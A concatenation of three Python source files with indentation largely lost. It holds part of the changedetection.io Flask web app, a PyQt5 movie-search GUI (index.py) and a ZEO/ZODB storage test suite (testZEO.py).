form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
form.notification_title.data = datastore.data['settings']['application']['notification_title']
form.notification_body.data = datastore.data['settings']['application']['notification_body']
form.notification_format.data = datastore.data['settings']['application']['notification_format']
form.base_url.data = datastore.data['settings']['application']['base_url']
# Password unset is a GET
if request.values.get('removepassword') == 'yes':
from pathlib import Path
datastore.data['settings']['application']['password'] = False
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if request.method == 'POST' and form.validate():
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['requests']['minutes_between_check'] = form.minutes_between_check.data
datastore.data['settings']['application']['extract_title_as_title'] = form.extract_title_as_title.data
datastore.data['settings']['application']['fetch_backend'] = form.fetch_backend.data
datastore.data['settings']['application']['notification_title'] = form.notification_title.data
datastore.data['settings']['application']['notification_body'] = form.notification_body.data
datastore.data['settings']['application']['notification_format'] = form.notification_format.data
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['application']['base_url'] = form.base_url.data
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': "Test from changedetection.io!",
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
if form.password.encrypted_password:
datastore.data['settings']['application']['password'] = form.password.encrypted_password
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
datastore.needs_write = True
flash("Settings updated.")
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
output = render_template("settings.html", form=form, current_base_url = datastore.data['settings']['application']['base_url'])
return output
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
import validators
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag="")
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
flash("{} Imported, {} Skipped.".format(good, len(remaining_urls)))
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
remaining="\n".join(remaining_urls)
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
flash("Cleared all statuses.")
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
# @todo replace datastore getter that does this automatically
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
output = render_template("diff.html", watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky= True )
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
newest = list(watch['history'].keys())[-1]
with open(watch['history'][newest], 'r') as f:
content = f.readlines()
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
current_diff_url=watch['url'],
uuid=uuid)
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("static/images", path="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(app.config['datastore_path']).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(app.config['datastore_path'], backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(app.config['datastore_path'], "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(app.config['datastore_path'], "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(app.config['datastore_path']).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(app.config['datastore_path'], ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = os.path.join(app.config['datastore_path'], "url-list.txt")
with open(list_file, "w") as f:
for uuid in datastore.data['watching']:
url = datastore.data['watching'][uuid]['url']
f.write("{}\r\n".format(url))
# Add it to the Zip
zipObj.write(list_file,
arcname="url-list.txt",
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
return send_from_directory(app.config['datastore_path'], backupname, as_attachment=True)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
try:
return send_from_directory("static/{}".format(group), path=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
@login_required
def api_watch_add():
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
if form.validate():
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
else:
flash("Error")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def api_delete():
uuid = request.args.get('uuid')
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/clone", methods=['GET'])
@login_required
def api_clone():
uuid = request.args.get('uuid')
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
new_uuid = datastore.clone(uuid)
update_q.put(new_uuid)
flash('Cloned.')
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
@login_required
def api_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are rechecking.".format(i))
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
    ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks)
    ticker_thread.start()
threading.Thread(target=notification_runner).start()
# Check for new release version, but not when running in test/build
if not os.getenv("GITHUB_REF", False):
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': __version__,
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
def notification_runner():
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from changedetectionio import notification
notification.process_notification(n_object, datastore)
except Exception as e:
print("Watch URL: {} Error {}".format(n_object['watch_url'], e))
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
from changedetectionio import update_worker
# Spin up Workers.
for _ in range(datastore.data['settings']['requests']['workers']):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
        # Re #232 - Deepcopy the data in case it changes while we're iterating through it all
copied_datastore = deepcopy(datastore)
# Check for watches outside of the time threshold to put in the thread queue.
for uuid, watch in copied_datastore.data['watching'].items():
# If they supplied an individual entry minutes to threshold.
if 'minutes_between_check' in watch and watch['minutes_between_check'] is not None:
                # Cast to int just in case
max_time = int(watch['minutes_between_check']) * 60
else:
# Default system wide.
max_time = int(copied_datastore.data['settings']['requests']['minutes_between_check']) * 60
threshold = time.time() - max_time
# Yeah, put it in the queue, it's more than time.
if not watch['paused'] and watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
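# Illustrative reduction of the scheduling rule above (hypothetical helper, not
# called by the ticker thread): a watch is due when it is not paused and its
# last check is at least ``minutes_between_check`` minutes old, preferring the
# per-watch value over the system-wide default.
def _watch_is_due(watch, system_minutes, now):
    minutes = watch.get('minutes_between_check') or system_minutes
    return not watch.get('paused') and watch['last_checked'] <= now - int(minutes) * 60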
|
index.py
|
import time
from ui.main_ui import Ui_MainWindow
import sys
from PyQt5.QtWidgets import QApplication, QMainWindow, QHeaderView, QTableWidgetItem, QWidget
from core.moviedl import moviedl
from PyQt5.QtCore import QObject, pyqtSignal
from threading import Thread
from ui.about import Ui_Dialog
# After editing the .ui file, regenerate the .py module: pyuic5 -o ./ui/main_ui.py ./ui/main_ui.ui
# Package as an exe: pyinstaller -w -F -i icon.ico index.py
# Use custom signals to drive UI element updates from worker threads
class MySignal(QObject):
btnChange = pyqtSignal(str) # 自定义信号
statusBarChange = pyqtSignal(str)
# 每一个窗口都是一个类文件
# 版本信息窗口
class DialogW(Ui_Dialog, QWidget):
def __init__(self):
super(DialogW, self).__init__()
self.setupUi(self)
# Main application window
class Main(Ui_MainWindow, QMainWindow):
def __init__(self):
super(Main, self).__init__()
self.setupUi(self)
self.ms = MySignal() # instantiate the custom signals
self.logic()
# Wire up the UI logic
def logic(self):
self.searchBtn.clicked.connect(self.search) # listen for the click event
self.actionversion.triggered.connect(self.show_about)
self.ms.btnChange.connect(self.btn_text_change) # listen for the custom signals
self.ms.statusBarChange.connect(self.status_bar_text_change)
# Show the "About"/version dialog
def show_about(self):
# The dialog must be a module-level (global) instance, otherwise it gets garbage-collected and the app crashes
dialog.show()
# QMessageBox.information(self, 'About', content, QMessageBox.Ok)
# Update the button text
def btn_text_change(self, text):
self.searchBtn.setText(text)
# Update the status bar text
def status_bar_text_change(self, text):
self.statusbar.showMessage(text)
# Start a search
def search(self):
# Do not run the search itself in the main thread
keyword = self.movieName.text() # get the search keyword
self.ms.btnChange.emit('Searching') # emit the custom signal
self.ms.statusBarChange.emit(f"[{keyword}] Searching....")
# Run the search in a worker thread so it does not block GUI rendering
def t_run(key):
md = moviedl()
start = time.time()
data = md.run(key)
end = time.time()
total_time = '%.2f' % (end - start)
self.show_result(data)
self.ms.statusBarChange.emit(f"[{key}] Search finished, found {len(data)} results in {total_time}s")
self.ms.btnChange.emit('Start Search') # emit the custom signal
task = Thread(target=t_run, args=(keyword,)) # args must be a tuple even with a single argument
task.start()
# Display the results
def show_result(self, data):
self.searchRes.horizontalHeader().setSectionResizeMode(2, QHeaderView.Interactive)
self.searchRes.setRowCount(len(data))
row = 0
for i in data:
self.searchRes.setItem(row, 0, QTableWidgetItem(i['source']))
self.searchRes.setItem(row, 1, QTableWidgetItem(i['movie_name']))
self.searchRes.setItem(row, 2, QTableWidgetItem(i['movie_link']))
row += 1
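# Minimal illustration (not used by the app) of the cross-thread pattern above:
# a worker thread emits a signal and the connected slot runs in the GUI thread.
# The names here are illustrative only.
class _ExampleWorkerSignal(QObject):
    done = pyqtSignal(str)

def _example_worker(signal_obj, keyword):
    # Safe to call from a background Thread: Qt queues the emission, so the
    # connected slot executes in the thread that owns the receiving object.
    signal_obj.done.emit('finished: ' + keyword)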
if __name__ == '__main__':
app = QApplication(sys.argv)
ui = Main() # instantiate the main window
ui.show() # show the main window
dialog = DialogW() # the child dialog must be instantiated at module (global) scope
sys.exit(app.exec_())
|
testZEO.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Test suite for ZEO based on ZODB.tests."""
from __future__ import print_function
import multiprocessing
import re
from ZEO.ClientStorage import ClientStorage
from ZEO.tests import forker, Cache, CommitLockTests, ThreadTests
from ZEO.tests import IterationTests
from ZEO._compat import PY3
from ZEO._compat import WIN
from ZODB.Connection import TransactionMetaData
from ZODB.tests import StorageTestBase, BasicStorage, \
TransactionalUndoStorage, \
PackableStorage, Synchronization, ConflictResolution, RevisionStorage, \
MTStorage, ReadOnlyStorage, IteratorStorage, RecoveryStorage
from ZODB.tests.MinPO import MinPO
from ZODB.tests.StorageTestBase import zodb_unpickle
from ZODB.utils import maxtid, p64, u64, z64
from zope.testing import renormalizing
import doctest
import logging
import os
import persistent
import pprint
import re
import shutil
import signal
import stat
import ssl
import sys
import tempfile
import threading
import time
import transaction
import unittest
import ZEO.StorageServer
import ZEO.tests.ConnectionTests
import ZODB
import ZODB.blob
import ZODB.tests.hexstorage
import ZODB.tests.testblob
import ZODB.tests.util
import ZODB.utils
import zope.testing.setupstack
from . import testssl
logger = logging.getLogger('ZEO.tests.testZEO')
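# DummyDB below provides just enough of the ZODB DB interface (invalidate,
# invalidateCache and the record-data transform hooks) for
# ClientStorage.registerDB() in these tests; it intentionally does nothing.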
class DummyDB(object):
def invalidate(self, *args):
pass
def invalidateCache(*unused):
pass
transform_record_data = untransform_record_data = lambda self, v: v
class CreativeGetState(persistent.Persistent):
def __getstate__(self):
self.name = 'me'
return super(CreativeGetState, self).__getstate__()
class Test_convenience_functions(unittest.TestCase):
def test_ZEO_client_convenience(self):
import mock
import ZEO
client_thread = mock.Mock(
spec=['call', 'async', 'async_iter', 'wait'])
client = ZEO.client(
8001, wait=False, _client_factory=client_thread)
self.assertIsInstance(client, ClientStorage)
def test_ZEO_DB_convenience_ok(self):
import mock
import ZEO
client_mock = mock.Mock(spec=['close'])
client_patch = mock.patch('ZEO.client', return_value=client_mock)
DB_patch = mock.patch('ZODB.DB')
dummy = object()
with client_patch as client:
with DB_patch as patched:
db = ZEO.DB(dummy)
self.assertIs(db, patched())
client.assert_called_once_with(dummy)
client_mock.close.assert_not_called()
def test_ZEO_DB_convenience_error(self):
import mock
import ZEO
client_mock = mock.Mock(spec=['close'])
client_patch = mock.patch('ZEO.client', return_value=client_mock)
DB_patch = mock.patch('ZODB.DB', side_effect=ValueError)
dummy = object()
with client_patch as client:
with DB_patch:
with self.assertRaises(ValueError):
ZEO.DB(dummy)
client.assert_called_once_with(dummy)
client_mock.close.assert_called_once()
def test_ZEO_connection_convenience_ok(self):
import mock
import ZEO
ret = object()
DB_mock = mock.Mock(spec=[
'close', 'open_then_close_db_when_connection_closes'])
DB_mock.open_then_close_db_when_connection_closes.return_value = ret
DB_patch = mock.patch('ZEO.DB', return_value=DB_mock)
dummy = object()
with DB_patch as patched:
conn = ZEO.connection(dummy)
self.assertIs(conn, ret)
patched.assert_called_once_with(dummy)
DB_mock.close.assert_not_called()
def test_ZEO_connection_convenience_value(self):
import mock
import ZEO
DB_mock = mock.Mock(spec=[
'close', 'open_then_close_db_when_connection_closes'])
otc = DB_mock.open_then_close_db_when_connection_closes
otc.side_effect = ValueError
DB_patch = mock.patch('ZEO.DB', return_value=DB_mock)
dummy = object()
with DB_patch as patched:
with self.assertRaises(ValueError):
ZEO.connection(dummy)
patched.assert_called_once_with(dummy)
DB_mock.close.assert_called_once()
class MiscZEOTests(object):
"""ZEO tests that don't fit in elsewhere."""
def checkCreativeGetState(self):
# This test covers persistent objects that provide their own
# __getstate__ which modifies the state of the object.
# For details see bug #98275
db = ZODB.DB(self._storage)
cn = db.open()
rt = cn.root()
m = CreativeGetState()
m.attr = 'hi'
rt['a'] = m
# This commit used to fail because of the `Mine` object being put back
# into `changed` state although it was already stored causing the ZEO
# cache to bail out.
transaction.commit()
cn.close()
def checkLargeUpdate(self):
obj = MinPO("X" * (10 * 128 * 1024))
self._dostore(data=obj)
def checkZEOInvalidation(self):
addr = self._storage._addr
storage2 = self._wrap_client(
ClientStorage(addr, wait=1, **self._client_options()))
try:
oid = self._storage.new_oid()
ob = MinPO('first')
revid1 = self._dostore(oid, data=ob)
data, serial = storage2.load(oid, '')
self.assertEqual(zodb_unpickle(data), MinPO('first'))
self.assertEqual(serial, revid1)
revid2 = self._dostore(oid, data=MinPO('second'), revid=revid1)
# Now, storage 2 should eventually get the new data. It
# will take some time, although hopefully not much.
# We'll poll till we get it and whine if we time out:
for n in range(30):
time.sleep(.1)
data, serial = storage2.load(oid, '')
if (serial == revid2 and
zodb_unpickle(data) == MinPO('second')
):
break
else:
raise AssertionError('Invalidation message was not sent!')
finally:
storage2.close()
def checkVolatileCacheWithImmediateLastTransaction(self):
# Earlier, a ClientStorage would not have the last transaction id
# available right after a successful connection; this is required now.
addr = self._storage._addr
storage2 = ClientStorage(addr, **self._client_options())
self.assertTrue(storage2.is_connected())
self.assertEqual(ZODB.utils.z64, storage2.lastTransaction())
storage2.close()
self._dostore()
storage3 = ClientStorage(addr, **self._client_options())
self.assertTrue(storage3.is_connected())
self.assertEqual(8, len(storage3.lastTransaction()))
self.assertNotEqual(ZODB.utils.z64, storage3.lastTransaction())
storage3.close()
class GenericTestBase(
# Base class for all ZODB tests
StorageTestBase.StorageTestBase):
shared_blob_dir = False
blob_cache_dir = None
server_debug = False
def setUp(self):
StorageTestBase.StorageTestBase.setUp(self)
logger.info("setUp() %s", self.id())
zport, stop = forker.start_zeo_server(
self.getConfig(), self.getZEOConfig(), debug=self.server_debug)
self._servers = [stop]
if not self.blob_cache_dir:
# This is the blob cache for ClientStorage
self.blob_cache_dir = tempfile.mkdtemp(
'blob_cache',
dir=os.path.abspath(os.getcwd()))
self._storage = self._wrap_client(
ClientStorage(
zport, '1', cache_size=20000000,
min_disconnect_poll=0.5, wait=1,
wait_timeout=60, blob_dir=self.blob_cache_dir,
shared_blob_dir=self.shared_blob_dir,
**self._client_options()),
)
self._storage.registerDB(DummyDB())
def getZEOConfig(self):
return forker.ZEOConfig(('127.0.0.1', 0))
def _wrap_client(self, client):
return client
def _client_options(self):
return {}
def tearDown(self):
self._storage.close()
for stop in self._servers:
stop()
StorageTestBase.StorageTestBase.tearDown(self)
class GenericTests(
GenericTestBase,
# ZODB test mixin classes (in the same order as imported)
BasicStorage.BasicStorage,
PackableStorage.PackableStorage,
Synchronization.SynchronizedStorage,
MTStorage.MTStorage,
ReadOnlyStorage.ReadOnlyStorage,
# ZEO test mixin classes (in the same order as imported)
CommitLockTests.CommitLockVoteTests,
ThreadTests.ThreadTests,
# Locally defined (see above)
MiscZEOTests,
):
"""Combine tests from various origins in one class.
"""
def open(self, read_only=0):
# Needed to support ReadOnlyStorage tests. Ought to be a
# cleaner way.
addr = self._storage._addr
self._storage.close()
self._storage = ClientStorage(
addr, read_only=read_only, wait=1, **self._client_options())
def checkWriteMethods(self):
# ReadOnlyStorage defines checkWriteMethods. The decision
# about where to raise the read-only error was changed after
# Zope 2.5 was released. So this test needs to detect Zope
# of the 2.5 vintage and skip the test.
# The __version__ attribute was not present in Zope 2.5.
if hasattr(ZODB, "__version__"):
ReadOnlyStorage.ReadOnlyStorage.checkWriteMethods(self)
def checkSortKey(self):
key = '%s:%s' % (self._storage._storage, self._storage._server_addr)
self.assertEqual(self._storage.sortKey(), key)
def _do_store_in_separate_thread(self, oid, revid, voted):
def do_store():
store = ZEO.ClientStorage.ClientStorage(
self._storage._addr, **self._client_options())
try:
t = transaction.get()
store.tpc_begin(t)
store.store(oid, revid, b'x', '', t)
store.tpc_vote(t)
store.tpc_finish(t)
except Exception as v:
import traceback
print('E'*70)
print(v)
traceback.print_exception(*sys.exc_info())
finally:
store.close()
thread = threading.Thread(name='T2', target=do_store)
thread.setDaemon(True)
thread.start()
thread.join(voted and .1 or 9)
return thread
class FullGenericTests(
GenericTests,
Cache.TransUndoStorageWithCache,
ConflictResolution.ConflictResolvingStorage,
ConflictResolution.ConflictResolvingTransUndoStorage,
PackableStorage.PackableUndoStorage,
RevisionStorage.RevisionStorage,
TransactionalUndoStorage.TransactionalUndoStorage,
IteratorStorage.IteratorStorage,
IterationTests.IterationTests,
):
"""Extend GenericTests with tests that MappingStorage can't pass."""
def checkPackUndoLog(self):
# PackableStorage.PackableUndoStorage wants to adjust
# time.sleep and time.time to cooperate and pretend for time
# to pass. That doesn't work for the spawned server, and this
# test case is very sensitive to times matching.
super_meth = super(FullGenericTests, self).checkPackUndoLog
# Find the underlying function, not the decorated method.
# If it doesn't exist, the implementation has changed and we
# need to revisit this...
try:
underlying_func = super_meth.__wrapped__
except AttributeError:
# ...unless we're on Python 2, which doesn't have the __wrapped__
# attribute.
if bytes is not str: # pragma: no cover Python 3
raise
unbound_func = PackableStorage.PackableUndoStorage.checkPackUndoLog
wrapper_func = unbound_func.__func__
underlying_func = wrapper_func.func_closure[0].cell_contents
underlying_func(self)
class FileStorageRecoveryTests(StorageTestBase.StorageTestBase,
RecoveryStorage.RecoveryStorage):
def getConfig(self):
return """\
<filestorage 1>
path %s
</filestorage>
""" % tempfile.mktemp(dir='.')
def _new_storage(self):
zconf = forker.ZEOConfig(('127.0.0.1', 0))
zport, stop = forker.start_zeo_server(self.getConfig(),
zconf)
self._servers.append(stop)
blob_cache_dir = tempfile.mkdtemp(dir='.')
storage = ClientStorage(
zport, '1', cache_size=20000000,
min_disconnect_poll=0.5, wait=1,
wait_timeout=60, blob_dir=blob_cache_dir)
storage.registerDB(DummyDB())
return storage
def setUp(self):
StorageTestBase.StorageTestBase.setUp(self)
self._servers = []
self._storage = self._new_storage()
self._dst = self._new_storage()
def tearDown(self):
self._storage.close()
self._dst.close()
for stop in self._servers:
stop()
StorageTestBase.StorageTestBase.tearDown(self)
def new_dest(self):
return self._new_storage()
class FileStorageTests(FullGenericTests):
"""Test ZEO backed by a FileStorage."""
def getConfig(self):
return """\
<filestorage 1>
path Data.fs
</filestorage>
"""
_expected_interfaces = (
('ZODB.interfaces', 'IStorageRestoreable'),
('ZODB.interfaces', 'IStorageIteration'),
('ZODB.interfaces', 'IStorageUndoable'),
('ZODB.interfaces', 'IStorageCurrentRecordIteration'),
('ZODB.interfaces', 'IExternalGC'),
('ZODB.interfaces', 'IStorage'),
('zope.interface', 'Interface'),
)
def checkInterfaceFromRemoteStorage(self):
# ClientStorage itself doesn't implement IStorageIteration, but the
# FileStorage on the other end does, and thus the ClientStorage
# instance that is connected to it reflects this.
self.assertFalse(ZODB.interfaces.IStorageIteration.implementedBy(
ZEO.ClientStorage.ClientStorage))
self.assertTrue(ZODB.interfaces.IStorageIteration.providedBy(
self._storage))
# This is communicated using ClientStorage's _info object:
self.assertEqual(self._expected_interfaces,
self._storage._info['interfaces']
)
class FileStorageSSLTests(FileStorageTests):
def getZEOConfig(self):
return testssl.server_config
def _client_options(self):
return {'ssl': testssl.client_ssl()}
class FileStorageHexTests(FileStorageTests):
_expected_interfaces = (
('ZODB.interfaces', 'IStorageRestoreable'),
('ZODB.interfaces', 'IStorageIteration'),
('ZODB.interfaces', 'IStorageUndoable'),
('ZODB.interfaces', 'IStorageCurrentRecordIteration'),
('ZODB.interfaces', 'IExternalGC'),
('ZODB.interfaces', 'IStorage'),
('ZODB.interfaces', 'IStorageWrapper'),
('zope.interface', 'Interface'),
)
def getConfig(self):
return """\
%import ZODB.tests
<hexstorage>
<filestorage 1>
path Data.fs
</filestorage>
</hexstorage>
"""
class FileStorageClientHexTests(FileStorageHexTests):
use_extension_bytes = True
def getConfig(self):
return """\
%import ZODB.tests
<serverhexstorage>
<filestorage 1>
path Data.fs
</filestorage>
</serverhexstorage>
"""
def _wrap_client(self, client):
return ZODB.tests.hexstorage.HexStorage(client)
class ClientConflictResolutionTests(
GenericTestBase,
ConflictResolution.ConflictResolvingStorage,
):
def getConfig(self):
return '<mappingstorage>\n</mappingstorage>\n'
def getZEOConfig(self):
# Using '' can result in binding to :: and cause problems
# connecting to the MTAcceptor on Travis CI
return forker.ZEOConfig(('127.0.0.1', 0), client_conflict_resolution=True)
class MappingStorageTests(GenericTests):
"""ZEO backed by a Mapping storage."""
def getConfig(self):
return """<mappingstorage 1/>"""
def checkSimpleIteration(self):
# The test base class IteratorStorage assumes that we keep undo data
# to construct our iterator, which we don't, so we disable this test.
pass
def checkUndoZombie(self):
# The test base class IteratorStorage assumes that we keep undo data
# to construct our iterator, which we don't, so we disable this test.
pass
class DemoStorageTests(
GenericTests,
):
def getConfig(self):
return """
<demostorage 1>
<filestorage 1>
path Data.fs
</filestorage>
</demostorage>
"""
def checkUndoZombie(self):
# The test base class IteratorStorage assumes that we keep undo data
# to construct our iterator, which we don't, so we disable this test.
pass
def checkPackWithMultiDatabaseReferences(self):
pass # DemoStorage pack doesn't do gc
checkPackAllRevisions = checkPackWithMultiDatabaseReferences
class ZRPCConnectionTests(ZEO.tests.ConnectionTests.CommonSetupTearDown):
def getConfig(self, path, create, read_only):
return """<mappingstorage 1/>"""
def checkCatastrophicClientLoopFailure(self):
# Test what happens when the client loop falls over
self._storage = self.openClientStorage()
import zope.testing.loggingsupport
handler = zope.testing.loggingsupport.InstalledHandler(
'ZEO.asyncio.client')
# We no longer implement the event loop, so we no longer know
# how to break it. We'll just stop it instead for now.
self._storage._server.loop.call_soon_threadsafe(
self._storage._server.loop.stop)
forker.wait_until(
'disconnected',
lambda : not self._storage.is_connected()
)
log = str(handler)
handler.uninstall()
self.assertTrue("Client loop stopped unexpectedly" in log)
def checkExceptionLogsAtError(self):
# Test the exceptions are logged at error
self._storage = self.openClientStorage()
self._dostore(z64, data=MinPO("X" * (10 * 128 * 1024)))
from zope.testing.loggingsupport import InstalledHandler
handler = InstalledHandler('ZEO.asyncio.client')
import ZODB.POSException
self.assertRaises(TypeError, self._storage.history, z64, None)
self.assertTrue(re.search(" from server: .*TypeError", str(handler)))
# POSKeyErrors and ConflictErrors aren't logged:
handler.clear()
self.assertRaises(ZODB.POSException.POSKeyError,
self._storage.history, None, None)
handler.uninstall()
self.assertEqual(str(handler), '')
def checkConnectionInvalidationOnReconnect(self):
storage = ClientStorage(self.addr, min_disconnect_poll=0.1)
self._storage = storage
assert storage.is_connected()
class DummyDB(object):
_invalidatedCache = 0
def invalidateCache(self):
self._invalidatedCache += 1
def invalidate(*a, **k):
pass
transform_record_data = untransform_record_data = \
lambda self, data: data
db = DummyDB()
storage.registerDB(db)
base = db._invalidatedCache
# Now we'll force a disconnection and reconnection
storage._server.loop.call_soon_threadsafe(
storage._server.client.protocol.connection_lost,
ValueError('test'))
# and we'll wait for the storage to be reconnected:
for i in range(100):
if storage.is_connected():
if db._invalidatedCache > base:
break
time.sleep(0.1)
else:
raise AssertionError("Couldn't connect to server")
# Now, the root object in the connection should have been invalidated:
self.assertEqual(db._invalidatedCache, base+1)
class CommonBlobTests(object):
def getConfig(self):
return """
<blobstorage 1>
blob-dir blobs
<filestorage 2>
path Data.fs
</filestorage>
</blobstorage>
"""
blobdir = 'blobs'
blob_cache_dir = 'blob_cache'
def checkStoreBlob(self):
import transaction
from ZODB.blob import Blob
from ZODB.tests.StorageTestBase import ZERO
from ZODB.tests.StorageTestBase import zodb_pickle
